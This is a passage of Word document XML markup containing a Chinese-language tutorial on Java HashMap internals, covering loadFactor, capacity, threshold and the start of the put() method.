      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    init();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>loadFactor :</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载因子，加载因子与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有关。默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.75</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>capacity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>容器大小，默认值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其大小为上面所说的数据结构中数组的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即为上面数据结构图中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方向的数组（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>transient Entry[] table;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">threshold </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的临界值，即当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中无素个数达到该值时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就会调用其</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法，重新扩充大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315D34" w:rsidRPr="00F41A4C" w:rsidRDefault="00315D34" w:rsidP="00315D34">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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从下面的代码中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315D34" w:rsidRPr="00F41A4C" w:rsidRDefault="00315D34" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (capacity &lt; initialCapacity)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315D34" w:rsidRPr="00F41A4C" w:rsidRDefault="00315D34" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>          capacity &lt;&lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315D34" w:rsidRPr="00F41A4C" w:rsidRDefault="00315D34" w:rsidP="00315D34">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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可以看出，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的倍数</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>  hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之后，我们得到了一个空的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>容器，我们接下来的可能就是往容器里面放我们的元素了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> V put(K key, V value) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (key == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> putForNullKey(value);  </w:t>
      </w:r>
    </w:p>
